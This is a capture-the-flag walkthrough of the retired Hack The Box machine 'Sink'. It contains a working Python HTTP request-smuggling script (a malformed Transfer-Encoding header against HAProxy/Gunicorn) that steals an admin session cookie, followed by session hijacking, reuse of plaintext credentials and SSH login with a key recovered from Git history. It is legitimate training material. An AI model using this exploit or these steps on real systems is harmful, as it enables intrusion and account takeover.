Hack The Box - Sink Writeup cover image

Hack The Box - Sink Writeup

Antonette Caldwell • October 3, 2021

retired insane

Machine: Sink

This write-up was last updated December 22, 2021

Completed on October 02, 2021

Scan the machine

nmap -Pn -p- --min-rate=1000 -T5 10.10.10.225 -oA Sink
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-02 15:22 UTC
Nmap scan report for 10.10.10.225
Host is up (0.0067s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 2.44 seconds

Check the services

nmap -Pn -sC -sV -p 22,3000,5000 10.10.10.225 -oA SinkServices
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-02 15:23 UTC
Nmap scan report for 10.10.10.225
Host is up (0.0037s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=b6cc6b915b42d8f3; Path=/; HttpOnly
|     Set-Cookie: _csrf=yWoheG7qRxRb_nV45avALUtbG2c6MTYzMzE4OTAzMzY4Mjg2NzQ2NQ; Path=/; Expires=Sun, 03 Oct 2021 15:37:13 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 02 Oct 2021 15:37:13 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|     <meta name="description" content="Gitea (Git with a cup of tea) is a painless
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=11cdfe1277e0a459; Path=/; HttpOnly
|     Set-Cookie: _csrf=xlukEraBNOPBLL1o7XsCQqgafuk6MTYzMzE4OTAzODcyNjI1MTg4NQ; Path=/; Expires=Sun, 03 Oct 2021 15:37:18 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 02 Oct 2021 15:37:18 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|_    <meta name="description" content="Gitea (Git with a c
5000/tcp open  http    Gunicorn 20.0.0
|_http-server-header: gunicorn/20.0.0
|_http-title: Sink Devops
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
--snippet--
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.90 seconds

I checked the nmap results and I saw that there are 3 ports: 22, 3000, and 5000. The port 3000 returns a Gitea site, and port 5000 returns Gunicorn web server and also a login page.

POST / HTTP/1.1
Host: sink.htb:5000
Content-Length: 67
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://sink.htb:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://sink.htb:5000/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=pyrrhus&email=pyrrhus%40example.com&password=P%40ssw0rd%21

After signing up, the sign up redirected me to the dashboard automatically signing me in.

GET /home HTTP/1.1
Host: sink.htb:5000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://sink.htb:5000/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJlbWFpbCI6InB5cnJodXNAZXhhbXBsZS5jb20ifQ.YVh-UA.Ph1zLI7aN_Ub08Z3uxdEJq02-dw
Connection: close

It looks like a blog about devops. There is an author Administrator and with the email address [email protected]. I went ahead and enumerated this site to see if anything interesting showed up.

wfuzz -w /usr/share/dirb/wordlists/big.txt --hc 404 -u http://10.10.10.225:5000/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.225:5000/FUZZ
Total requests: 20469

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000002401:   400        4 L      10 W       95 Ch       "anv..ndare"
000004964:   405        4 L      23 W       178 Ch      "comment"                                                                                                                    

 /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Pycurl error 7: Failed to connect to 10.10.10.225 port 5000: Connection refused
Total time: 34.59148
Processed Requests: 8116
Filtered Requests: 8114
Requests/sec.: 234.6242

There seems to be nothing on the blog. So let me check out the Gitea website.

GET / HTTP/1.1
Host: sink.htb:3000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJlbWFpbCI6InB5cnJodXNAZXhhbXBsZS5jb20ifQ.YVh-UA.Ph1zLI7aN_Ub08Z3uxdEJq02-dw
Connection: close

Check out the login page.

GET /user/login?redirect_to= HTTP/1.1
Host: sink.htb:3000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJlbWFpbCI6InB5cnJodXNAZXhhbXBsZS5jb20ifQ.YVh-UA.Ph1zLI7aN_Ub08Z3uxdEJq02-dw; lang=en-US; i_like_gitea=d27aded02e6bd797; _csrf=o7kA0Y5sOOwgsds2bVlTAK_sppU6MTYzMzE4OTc3MjM5OTIzMTM4Mg
Connection: close

I tried logging in with gitea:gitea just to make sure that the server wasn't setup with the default credentials.

POST /user/login HTTP/1.1
Host: sink.htb:3000
Content-Length: 91
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJlbWFpbCI6InB5cnJodXNAZXhhbXBsZS5jb20ifQ.YVh-UA.Ph1zLI7aN_Ub08Z3uxdEJq02-dw; lang=en-US; i_like_gitea=d27aded02e6bd797; _csrf=o7kA0Y5sOOwgsds2bVlTAK_sppU6MTYzMzE4OTc3MjM5OTIzMTM4Mg
Connection: close

_csrf=o7kA0Y5sOOwgsds2bVlTAK_sppU6MTYzMzE4OTc3MjM5OTIzMTM4Mg&user_name=gitea&password=gitea

I went back to Gitea to check out the users. There are three david, marcus, and root. I browsed through their repos and see if they have anything, but nothing was here. I'm keeping in mind of the users for later.

Let's go back to the Sink DevOps page. As noted before, there is a Gunicorn server that is being used with Haproxy. It showed up in Burp Suite, but I also went ahead and use Wireshark to capture what happens.

HTTP/1.1 200 OK
Server: gunicorn/20.0.0
Date: Sat, 02 Oct 2021 18:21:06 GMT
Connection: close
Content-Type: image/jpeg
Content-Length: 254071
Via: haproxy
X-Served-By: 43cf1c3e4113

Create a python script

#!/usr/bin/env python3

import socket
import time

# host = "127.0.0.1"
# port = 8000

vuln_host = "10.10.10.225"
vuln_port = 5000

body = f"""0

POST /notes HTTP/1.1
Host: {vuln_host}:{vuln_port}
Content-Length: 300
Origin: http://{vuln_host}:{vuln_port}
Content-Type: text/plain
Referer: http://10.10.10.225:5000/notes
Cookie: session=eyJlbWFpbCI6InB5cnJodXNAZXhhbXBsZS5jb20ifQ.YVh-UA.Ph1zLI7aN_Ub08Z3uxdEJq02-dw

note=""".replace('\n','\r\n')

header = f"""GET / HTTP/1.1
Host: {vuln_host}:{vuln_port}
Content-Length: {len(body)}
Transfer-Encoding: \x0bchunked

""".replace('\n','\r\n')

request = (header + body).encode()

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((vuln_host, vuln_port))
    s.send(request)
    time.sleep(5)

Test the code

nc -lnp 8000
GET / HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 685
Transfer-Encoding: 
                   chunked

0

POST /notes HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 10
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://sink.htb:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.225:5000/notes
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJlbWFpbCI6InB5cnJodXNAZXhhbXBsZS5jb20ifQ.YVh-UA.Ph1zLI7aN_Ub08Z3uxdEJq02-dw

After running the script a couple times and changing out portions of the script to get it to work.

GET /notes/delete/1234 HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept-Encoding: gzip, deflate Accept: */* Cookie: session=eyJlbWFpbCI6ImFkbWluQHNpbmsuaHRiIn0.YVh6nw.MJOfvnbxMWLYpIv0eMVG_gud_18 X-Forwarded-For: 127.0.0.1

I was able to decode the session in jwt. It returns the aforementioned account [email protected] jwt token. I bypassed the request in Burp Suite by removing my session and input the admin session token.

I noticed there were three notes.

Chef Login : http://chef.sink.htb Username : chefadm Password : /6'fEGC&zEx{4]zz
Dev Node URL : http://code.sink.htb Username : root Password : FaH@3L>Z3})zzfQ3
Nagios URL : https://nagios.sink.htb Username : nagios_adm Password : g8<H6GK\{*L.fB3C

I tried to access each of these URLs, but they did not return a site, so I saw that there is a credential for the Dev Node. This credentials worked for the Gitea login.

While browsing through the three repositories that were available for me see, I went ahead and look on the main repositories for root, and found an archived repo called Key_Management.

There is a commit history that showed an ssh key has been removed. Copy the ssh key to a file and change the permission to 400 and then connect to the server.

chmod 400 marcus_key 
$ssh -i marcus_key [email protected]
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 02 Oct 2021 07:15:32 PM UTC

  System load:                      0.16
  Usage of /:                       38.3% of 17.59GB
  Memory usage:                     58%
  Swap usage:                       0%
  Processes:                        302
  Users logged in:                  0
  IPv4 address for br-85739d6e29c0: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens160:          10.10.10.225

 * Introducing self-healing high availability clusters in MicroK8s.
   Simple, hardened, Kubernetes for production, from RaspberryPi to DC.

     https://microk8s.io/high-availability

197 updates can be installed immediately.
115 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Wed Jan 27 12:14:16 2021 from 10.10.14.4
marcus@sink:~$ ls
user.txt
marcus@sink:~$ cat user.txt 
--snippet--

Now that we have the user.txt, let's take a look on the server.

ps auxwww --forest
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
--snippet--
root           1  0.0  0.2 167936 11888 ?        Ss   15:27   0:03 /sbin/init maybe-ubiquity
root         582  0.0  0.9  84508 36800 ?        S<s  15:27   0:04 /lib/systemd/systemd-journald
root         610  0.0  0.1  21236  5212 ?        Ss   15:27   0:00 /lib/systemd/systemd-udevd
root         759  0.0  0.4 345804 18200 ?        SLsl 15:27   0:05 /sbin/multipathd -d -s
systemd+     797  0.0  0.3  24584 13528 ?        Ss   15:27   0:01 /lib/systemd/systemd-resolved
systemd+     798  0.0  0.1  90396  6376 ?        Ssl  15:27   0:00 /lib/systemd/systemd-timesyncd
root         809  0.0  0.2  47532 10428 ?        Ss   15:27   0:00 /usr/bin/VGAuthService
root         810  0.0  0.1 237104  7716 ?        Ssl  15:27   0:14 /usr/bin/vmtoolsd
root         943  0.0  0.1 235640  7520 ?        Ssl  15:27   0:00 /usr/lib/accountsservice/accounts-daemon
message+     946  0.0  0.1   7632  4608 ?        Ss   15:27   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root         962  0.0  0.0  81952  3792 ?        Ssl  15:27   0:00 /usr/sbin/irqbalance --foreground
syslog       966  0.0  0.1 224332  5300 ?        Ssl  15:27   0:01 /usr/sbin/rsyslogd -n -iNONE
root         969  0.0  0.6 850276 27884 ?        Ssl  15:27   0:04 /usr/lib/snapd/snapd
root         971  0.0  0.1  16816  7916 ?        Ss   15:27   0:00 /lib/systemd/systemd-logind
root        1118  0.0  0.1 232708  6892 ?        Ssl  15:27   0:00 /usr/lib/policykit-1/polkitd --no-debug
git         1131  0.5  6.5 1658876 264108 ?      SLsl 15:27   1:26 /usr/local/bin/gitea web --config /etc/gitea/app.ini
root        1139  0.0  0.0   6812  2992 ?        Ss   15:27   0:00 /usr/sbin/cron -f
root        1148  0.1  1.3 1363432 52868 ?       Ssl  15:27   0:14 /usr/bin/containerd
root        2611  0.0  0.1 110108  6064 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/ec0b4822129edc8b2f15b1186e9201d4049e97ee437b6b0d15eaa591b7efbe73 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        2713  0.0  0.0   2232  1732 ?        Ss   15:27   0:00  |   \_ /bin/bash /usr/local/bin/docker-entrypoint.sh
root        3553  0.0  0.4  21848 19804 ?        S    15:27   0:05  |       \_ /usr/bin/python3.8 /usr/bin/supervisord -c /etc/supervisord.conf
root        3872  0.0  0.0   1160   700 ?        S    15:28   0:00  |       |   \_ make infra
root        3874  0.3  2.9 127628 119616 ?       Sl   15:28   0:47  |       |       \_ python bin/localstack start --host
root        5028  0.0  0.2 714668 10852 ?        Ssl  15:28   0:01  |       |           \_ /opt/code/localstack/localstack/infra/kms/local-kms.alpine.bin
root        3555  0.0  0.0   1568     4 ?        S    15:27   0:01  |       \_ tail -qF /tmp/localstack_infra.log /tmp/localstack_infra.err
root        2619  0.0  0.1 108700  6376 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/874e4a1392a2a0c4a645f064ebbbb8828ba669e0edb7417d8cc0b748ee8bfc28 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        2746  0.0  0.5  63508 20176 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3723  0.0  0.6 106312 26688 ?        S    15:28   0:01  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       3937  0.2  0.8 132144 33580 ?        S    15:28   0:32  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3724  0.0  0.1  27992  4284 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      3725  0.2  0.5  63908 20848 ?        S    15:28   0:34  |       \_ python3 /home/bot/bot.py
root        5301  0.1  0.4 356196 16372 ?        Sl   15:29   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        2756  0.0  0.1 110108  5144 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/5e2c45dfa518c1786b0316a91f609c38bf74d9d6d0414a1e1ff004fbae79eac9 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        2869  0.0  0.5  63504 20236 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3952  0.0  0.6 106312 26652 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4173  0.2  0.8 132136 33600 ?        S    15:28   0:35  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3955  0.0  0.1  27992  4328 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      3957  0.2  0.5  63908 20836 ?        S    15:28   0:32  |       \_ python3 /home/bot/bot.py
root        5578  0.1  0.4 356196 16460 ?        Sl   15:29   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        2776  0.0  0.1 110108  5924 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/aacae3cf513b6743b303136fbab509735c6c56656f121056772255da58a78ed4 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3071  0.0  0.5  63512 20352 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        4008  0.0  0.6 106312 26800 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4254  0.2  0.8 132136 33364 ?        S    15:28   0:34  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    4009  0.0  0.1  27992  4308 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      4223  0.2  0.5  63908 20912 ?        S    15:28   0:34  |       \_ python3 /home/bot/bot.py
root        5083  0.1  0.4 356196 16348 ?        Sl   15:28   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        2804  0.0  0.1 110108  5964 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/a3bb59be4ff6ce978153fb2a864a424406ed6ec8b5536d9b42699e6c5bd6eebc -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3060  0.0  0.5  63512 20236 ?        Ss   15:27   0:07  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3928  0.0  0.6 106312 26828 ?        S    15:28   0:01  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4110  0.2  0.8 132140 33504 ?        S    15:28   0:34  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3929  0.0  0.1  27992  4324 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      3930  0.2  0.5  63908 20832 ?        S    15:28   0:34  |       \_ python3 /home/bot/bot.py
root        5506  0.1  0.4 356196 16400 ?        Sl   15:29   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        2833  0.0  0.1 108700  5204 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/ff0c84e62bfa5ab4970744971e02b3f867e78b5721e82df1d34cfa41d55bc584 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3088  0.0  0.5  63508 20164 ?        Ss   15:27   0:07  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3769  0.0  0.6 106312 26776 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4011  0.2  0.8 132136 33448 ?        S    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3770  0.0  0.1  27992  4312 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      4056  0.2  0.5  63908 20916 ?        S    15:28   0:33  |       \_ python3 /home/bot/bot.py
root        5137  0.1  0.4 356196 16356 ?        Sl   15:29   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        2921  0.0  0.1 110108  6096 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/c8361846ea2c8bb7d7fae7378fe69451450c89cf8d3e46c8276e8b02faaff42e -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3013  0.0  0.5  63508 20256 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3803  0.0  0.6 106312 26648 ?        S    15:28   0:01  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       3991  0.2  0.8 132080 33584 ?        S    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3804  0.0  0.1  27992  4324 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      3805  0.2  0.5  63908 20960 ?        S    15:28   0:34  |       \_ python3 /home/bot/bot.py
root        5351  0.1  0.4 356196 16464 ?        Sl   15:29   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        2963  0.0  0.1 108700  6372 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/43cf1c3e41138c03d689e69555f51f26fd4ad4e6424c2314f8e3a3e19f9b032a -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3188  0.0  0.5  63508 20328 ?        Ss   15:27   0:07  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3924  0.0  0.6 106312 26864 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4206  0.2  0.8 134116 35248 ?        S    15:28   0:43  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3925  0.0  0.1  28264  4688 ?        S    15:28   0:07  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      3926  0.2  0.5  63908 20876 ?        S    15:28   0:34  |       \_ python3 /home/bot/bot.py
root        4848  0.1  0.4 362800 17376 ?        Sl   15:28   0:27  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3011  0.0  0.1 108700  5136 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/a3308a3f1e594a4c065a37abcf430b5e0f94700d774a63e957a0a247a0f3ced8 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3156  0.0  0.5  63508 20160 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        4013  0.0  0.6 106312 26788 ?        S    15:28   0:01  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4105  0.2  0.8 132140 33456 ?        S    15:28   0:34  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    4017  0.0  0.1  27992  4220 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      4018  0.2  0.5  63908 20872 ?        S    15:28   0:33  |       \_ python3 /home/bot/bot.py
root        5190  0.1  0.4 356196 16408 ?        Sl   15:29   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3098  0.0  0.1 110108  5264 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/1bc3f322af051da6cd4401088791d40adc0a8dbd68948dd89ff185d82806d48e -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3275  0.0  0.5  63396 20276 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3995  0.0  0.6 106312 26720 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4205  0.2  0.8 132136 33420 ?        S    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3996  0.0  0.1  27992  4332 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      3998  0.2  0.5  63908 20808 ?        S    15:28   0:34  |       \_ python3 /home/bot/bot.py
root        4957  0.1  0.4 356196 16372 ?        Sl   15:28   0:20  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3128  0.0  0.1 110108  6088 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/07c9fe1b8aeab2e9f73938744139b799c6500b7d659bfe85e14c410f51e63cc0 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
